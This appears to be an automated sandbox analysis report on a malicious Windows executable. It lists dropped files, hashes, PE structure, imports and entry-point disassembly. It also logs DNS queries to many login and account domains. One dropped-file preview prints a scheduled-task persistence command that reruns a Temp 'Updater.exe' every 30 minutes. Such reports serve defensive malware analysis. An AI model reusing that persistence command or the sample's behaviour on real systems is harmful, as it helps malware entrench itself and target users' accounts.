                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):131
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.797757447689461
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:HFUuvaOpLKBchEXEtTC5WAuN+E2J5xAIEyrKBySKFS3:Ogas7SXEFAuN723faKS3
                                                                                                                                                                                                                                                                                                                                                                MD5:467322334BC9A78A5E8C16164C4CFA5E
                                                                                                                                                                                                                                                                                                                                                                SHA1:F8EA2C7B5BB81F45C1A4AB4CBA90A29FC60868E6
                                                                                                                                                                                                                                                                                                                                                                SHA-256:5061C3009CC21C72B82EDA2440994EFC0C972F387244E5A4CC0A6DDFA0F8EECA
                                                                                                                                                                                                                                                                                                                                                                SHA-512:441F536C169F90BBB8185366DA91837B892D06BBA1E413956D3D1507E12BA4D9E34A616D2920B3619A7811D1D7AC065A114280A72AFF5D0F3B180CAEA7E64C3F
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:chcp 1251.. schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F..
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):306176
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.555852720200777
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:cwwL+ceqk8AFIYODCl9diUGQHzu3jmtRYEM+:rwqcG8U9O49drgjG
                                                                                                                                                                                                                                                                                                                                                                MD5:9DF4007D210772FC229EEFEA7F15C06D
                                                                                                                                                                                                                                                                                                                                                                SHA1:021AE6BCE912D6A3FE9435A307EAC6B85EB18865
                                                                                                                                                                                                                                                                                                                                                                SHA-256:1A04A01FF9144CEE276994C8A5BEDA3EBACBC4846AFB13B8A700212C1092EF14
                                                                                                                                                                                                                                                                                                                                                                SHA-512:CDB941ACD5E97DEDF8C35B2EA78375B8235AB56CB37297648A66AE2A82AA8919F7ECE185A2E244D0AF396CDEF2C66EC19F5CB29D0C56F597FAD46B6B9AC277BD
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):26
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.555852720200777
                                                                                                                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                                                                                                                                                                                                                • Clipper DOS Executable (2020/12) 0.02%
                                                                                                                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                                                                                • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                                                                                                                                                                                File name:S23UhdW5DH.exe
                                                                                                                                                                                                                                                                                                                                                                File size:306'176 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5:9df4007d210772fc229eefea7f15c06d
                                                                                                                                                                                                                                                                                                                                                                SHA1:021ae6bce912d6a3fe9435a307eac6b85eb18865
                                                                                                                                                                                                                                                                                                                                                                SHA256:1a04a01ff9144cee276994c8a5beda3ebacbc4846afb13b8a700212c1092ef14
                                                                                                                                                                                                                                                                                                                                                                SHA512:cdb941acd5e97dedf8c35b2ea78375b8235ab56cb37297648a66ae2a82aa8919f7ece185a2e244d0af396cdef2c66ec19f5cb29d0c56f597fad46b6b9ac277bd
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:cwwL+ceqk8AFIYODCl9diUGQHzu3jmtRYEM+:rwqcG8U9O49drgjG
                                                                                                                                                                                                                                                                                                                                                                TLSH:59546C4396D1BD50DD268A73CD2EC6E8BA2EF560DE59777A2218AF1F04B0071D173B21
                                                                                                                                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L...$..c...
                                                                                                                                                                                                                                                                                                                                                                Icon Hash:71514121434a4043
                                                                                                                                                                                                                                                                                                                                                                Entrypoint:0x40217f
                                                                                                                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                                                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                                                                Time Stamp:0x631FA924 [Mon Sep 12 21:48:20 2022 UTC]
                                                                                                                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                Import Hash:6ccd4bc2d35613d37d4776250d7c29da
                                                                                                                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                                                                                                                call 00007F45CD26BF8Dh
                                                                                                                                                                                                                                                                                                                                                                jmp 00007F45CD267E8Eh
                                                                                                                                                                                                                                                                                                                                                                mov edi, edi
                                                                                                                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                                                                                                                                push ecx
                                                                                                                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                                                                                                                mov esi, dword ptr [ebp+0Ch]
                                                                                                                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                                                                                                                call 00007F45CD26CC1Dh
mov dword ptr [ebp+0Ch], eax
mov eax, dword ptr [esi+0Ch]
pop ecx
test al, 82h
jne 00007F45CD268029h
call 00007F45CD268FBDh
mov dword ptr [eax], 00000009h
or dword ptr [esi+0Ch], 20h
or eax, FFFFFFFFh
jmp 00007F45CD268144h
test al, 40h
je 00007F45CD26801Fh
call 00007F45CD268FA2h
mov dword ptr [eax], 00000022h
jmp 00007F45CD267FF5h
push ebx
xor ebx, ebx
test al, 01h
je 00007F45CD268028h
mov dword ptr [esi+04h], ebx
test al, 10h
je 00007F45CD26809Dh
mov ecx, dword ptr [esi+08h]
and eax, FFFFFFFEh
mov dword ptr [esi], ecx
mov dword ptr [esi+0Ch], eax
mov eax, dword ptr [esi+0Ch]
and eax, FFFFFFEFh
or eax, 02h
mov dword ptr [esi+0Ch], eax
mov dword ptr [esi+04h], ebx
mov dword ptr [ebp-04h], ebx
test eax, 0000010Ch
jne 00007F45CD26803Eh
call 00007F45CD26C9FAh
add eax, 20h
cmp esi, eax
je 00007F45CD26801Eh
call 00007F45CD26C9EEh
add eax, 40h
cmp esi, eax
jne 00007F45CD26801Fh
push dword ptr [ebp+0Ch]
call 00007F45CD26C97Bh
pop ecx
test eax, eax
jne 00007F45CD268019h
push esi
call 00007F45CD26C927h
pop ecx
test dword ptr [esi+0Ch], 00000108h
push edi
je 00007F45CD268096h
mov eax, dword ptr [esi+08h]
mov edi, dword ptr [esi]
lea ecx, dword ptr [eax+01h]
mov dword ptr [esi], ecx
| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2c2ac | 0x50 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x40000 | 0x1a478 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x271e0 | 0x1c | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2bb68 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x27000 | 0x194 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x1000 | 0x253f6 | 0x25400 | 8c0da6816527165647142510d16819e6 | False | 0.8168322671979866 | data | 7.661739793438813 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x27000 | 0x5be4 | 0x5c00 | 3ff899a61d3daac4169650995ca2e66e | False | 0.43295686141304346 | data | 5.9108216114896805 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x2d000 | 0x12564 | 0x5200 | 86b4cf60153402405aaba5690643a427 | False | 0.10656440548780488 | dBase III DBT, next free block index 7565155, 1st item "?\033" | 1.2328868885763893 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x40000 | 0x1a478 | 0x1a600 | c971fa7f697df4e845c9e9a54bd4a668 | False | 0.3953180539099526 | data | 4.679877571710922 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| AFX_DIALOG_LAYOUT | 0x550a8 | 0xe | data | | | 1.5714285714285714 |
| PIFAFESESUDAFOREMANIBOBIPIRIY | 0x53228 | 0x1e31 | ASCII text, with very long lines (7729), with no line terminators | Romanian | Romania | 0.5889507051364989 |
| RT_CURSOR | 0x550b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.2953091684434968 |
| RT_CURSOR | 0x55f60 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.46705776173285196 |
| RT_CURSOR | 0x56808 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5361271676300579 |
| RT_CURSOR | 0x56da0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.26439232409381663 |
| RT_CURSOR | 0x57c48 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.3686823104693141 |
| RT_CURSOR | 0x584f0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.49060693641618497 |
| RT_CURSOR | 0x58a88 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.4375 |
| RT_CURSOR | 0x58bb8 | 0xb0 | Device independent bitmap graphic, 16 x 32 x 1, image size 0 | | | 0.44886363636363635 |
| RT_ICON | 0x409f0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Romanian | Romania | 0.4341684434968017 |
| RT_ICON | 0x41898 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Romanian | Romania | 0.5550541516245487 |
| RT_ICON | 0x42140 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Romanian | Romania | 0.5817972350230415 |
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x428080x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania0.6062138728323699
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x42d700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.44491701244813275
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x453180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania0.4946060037523452
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x463c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.524822695035461
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x468900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsRomanianRomania0.5167910447761194
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x477380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsRomanianRomania0.5090252707581228
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x47fe00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsRomanianRomania0.44873271889400923
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x486a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsRomanianRomania0.4761560693641618
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x48c100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216RomanianRomania0.2816390041493776
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x4b1b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096RomanianRomania0.30909943714821764
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x4c2600x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304RomanianRomania0.34098360655737703
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x4cbe80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024RomanianRomania0.375886524822695
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x4d0c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0RomanianRomania0.48640724946695096
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x4df700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RomanianRomania0.4666064981949459
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x4e8180x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania0.42846820809248554
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x4ed800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.279045643153527
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x513280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania0.2901031894934334
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x523d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0RomanianRomania0.3094262295081967
                                                                                                                                                                                                                                                                                                                                                                RT_ICON0x52d580x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.33599290780141844
                                                                                                                                                                                                                                                                                                                                                                RT_STRING0x58e800x2e6dataRomanianRomania0.5013477088948787
                                                                                                                                                                                                                                                                                                                                                                RT_STRING0x591680x434dataRomanianRomania0.45260223048327136
                                                                                                                                                                                                                                                                                                                                                                RT_STRING0x595a00x394StarOffice Gallery theme i, 1677748480 objects, 1st uRomanianRomania0.46943231441048033
                                                                                                                                                                                                                                                                                                                                                                RT_STRING0x599380x4e4dataRomanianRomania0.45527156549520764
                                                                                                                                                                                                                                                                                                                                                                RT_STRING0x59e200x380dataRomanianRomania0.47767857142857145
                                                                                                                                                                                                                                                                                                                                                                RT_STRING0x5a1a00x2d4dataRomanianRomania0.48342541436464087
                                                                                                                                                                                                                                                                                                                                                                RT_ACCELERATOR0x550600x48dataRomanianRomania0.8472222222222222
                                                                                                                                                                                                                                                                                                                                                                RT_GROUP_CURSOR0x56d700x30data0.9375
                                                                                                                                                                                                                                                                                                                                                                RT_GROUP_CURSOR0x58a580x30data0.9375
                                                                                                                                                                                                                                                                                                                                                                RT_GROUP_CURSOR0x58c680x22data1.0588235294117647
                                                                                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0x468280x68dataRomanianRomania0.6826923076923077
                                                                                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0x4d0500x76dataRomanianRomania0.6779661016949152
                                                                                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0x531c00x68dataRomanianRomania0.7115384615384616
                                                                                                                                                                                                                                                                                                                                                                RT_VERSION0x58c900x1f0MS Windows COFF PowerPC object file0.5362903225806451
DLL: Import
KERNEL32.dll: SetComputerNameExA, SetWaitableTimer, InterlockedIncrement, GetModuleHandleW, GetTickCount, FindNextVolumeMountPointA, ReadConsoleW, EnumResourceTypesA, TlsSetValue, GetVolumeInformationA, LoadLibraryW, SetCommConfig, AssignProcessToJobObject, GetNamedPipeInfo, GetModuleFileNameW, CreateJobObjectA, InterlockedExchange, GetLogicalDriveStringsA, SetVolumeLabelA, GetProcAddress, VirtualAlloc, RemoveDirectoryA, LoadLibraryA, OpenMutexA, LocalAlloc, MoveFileA, GetNumberFormatW, GlobalFindAtomW, GetConsoleTitleW, VirtualProtect, GetFileAttributesExW, GetCurrentProcessId, AddConsoleAliasA, ReadConsoleOutputCharacterW, DeleteFileA, GetLastError, GetSystemDefaultLangID, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, HeapFree, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsFree, SetLastError, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, EnterCriticalSection, LeaveCriticalSection, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetModuleHandleA, RaiseException, HeapAlloc, HeapReAlloc, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, CreateFileA, CloseHandle, FlushFileBuffers
USER32.dll: LoadMenuW
GDI32.dll: GetCharABCWidthsFloatW
Language of compilation system: Romanian
Country where language is spoken: Romania
Timestamp, Source IP, Dest IP, Trans ID, OP Code, Name, Type, Class, DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.060945988 CET192.168.2.61.1.1.10x8097Standard query (0)signin.rockstargames.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.061202049 CET192.168.2.61.1.1.10xe216Standard query (0)0260049m.index-education.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.061326027 CET192.168.2.61.1.1.10x8214Standard query (0)accounts.ecitizen.go.keMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.062321901 CET192.168.2.61.1.1.10x9c4eStandard query (0)ucivirtual.uci.edu.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.063976049 CET192.168.2.61.1.1.10xeba4Standard query (0)rage.mpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.075603962 CET192.168.2.61.1.1.10xd9b1Standard query (0)netizion.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.077558041 CET192.168.2.61.1.1.10xd994Standard query (0)store.steampowered.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.082741976 CET192.168.2.61.1.1.10xe5a6Standard query (0)sii.itzacatepec.edu.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.082930088 CET192.168.2.61.1.1.10xa10fStandard query (0)m.codere.com.coMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.083338022 CET192.168.2.61.1.1.10x3e7bStandard query (0)3fba-180-252-166-236.ngrok.ioMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.083645105 CET192.168.2.61.1.1.10x7f91Standard query (0)servicios.sat.gob.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.084376097 CET192.168.2.61.1.1.10x663cStandard query (0)warriorplus.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.085016966 CET192.168.2.61.1.1.10xf0f6Standard query (0)upsconline.nic.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.085108995 CET192.168.2.61.1.1.10x39a2Standard query (0)money-farm.ccMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.085465908 CET192.168.2.61.1.1.10xe5f4Standard query (0)app.jobpet.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.085587025 CET192.168.2.61.1.1.10xd71eStandard query (0)lookaside.fbsbx.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.093163967 CET192.168.2.61.1.1.10x1bfStandard query (0)web.facebook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.093532085 CET192.168.2.61.1.1.10xca1aStandard query (0)account.live.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.093570948 CET192.168.2.61.1.1.10xfde8Standard query (0)uh.isMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.093816996 CET192.168.2.61.1.1.10x4de6Standard query (0)foros.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.098053932 CET192.168.2.61.1.1.10x2d12Standard query (0)zarkana2.roMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.098103046 CET192.168.2.61.1.1.10x5d61Standard query (0)ro.bongacams.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.098488092 CET192.168.2.61.1.1.10x93ffStandard query (0)signup2.br.leagueoflegends.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.099189997 CET192.168.2.61.1.1.10x3ba1Standard query (0)genshin.mihoyo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.099536896 CET192.168.2.61.1.1.10x2b48Standard query (0)iam.gov.saMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.100938082 CET192.168.2.61.1.1.10xffccStandard query (0)api.cmrsanmartin.ziz.clMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.106801033 CET192.168.2.61.1.1.10xfff3Standard query (0)connect.appen.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.107384920 CET192.168.2.61.1.1.10x33b7Standard query (0)account.mojang.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.108002901 CET192.168.2.61.1.1.10x2931Standard query (0)authenticate.riotgames.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.108197927 CET192.168.2.61.1.1.10xd641Standard query (0)testconnect.garena.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.109210014 CET192.168.2.61.1.1.10x4cfcStandard query (0)yellosa.co.zaMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.109922886 CET192.168.2.61.1.1.10x2b10Standard query (0)chainmine.ioMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.110322952 CET192.168.2.61.1.1.10x4e7fStandard query (0)kamgarsetu.mp.gov.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.111088037 CET192.168.2.61.1.1.10xb9f0Standard query (0)gitam.zoom.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.112641096 CET192.168.2.61.1.1.10x9aeStandard query (0)analvids.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.116055012 CET192.168.2.61.1.1.10x6f7fStandard query (0)accounts.google.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.119235039 CET192.168.2.61.1.1.10xc6a3Standard query (0)pxndx-mcr.boletia.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.142030001 CET192.168.2.61.1.1.10xe1d8Standard query (0)auth.cambridgelms.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.142030001 CET192.168.2.61.1.1.10x4641Standard query (0)sii.ittlahuac.edu.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.148274899 CET192.168.2.61.1.1.10xbdedStandard query (0)ag.ufa9999.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.148818970 CET192.168.2.61.1.1.10x4355Standard query (0)kwyk.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.149576902 CET192.168.2.61.1.1.10x1396Standard query (0)login.adf.lyMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.151149035 CET192.168.2.61.1.1.10x3e7Standard query (0)sport.autoplay.cloudMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.152782917 CET192.168.2.61.1.1.10x4d06Standard query (0)ssc.nic.inMX (Mail exchange)IN (0x0001)false
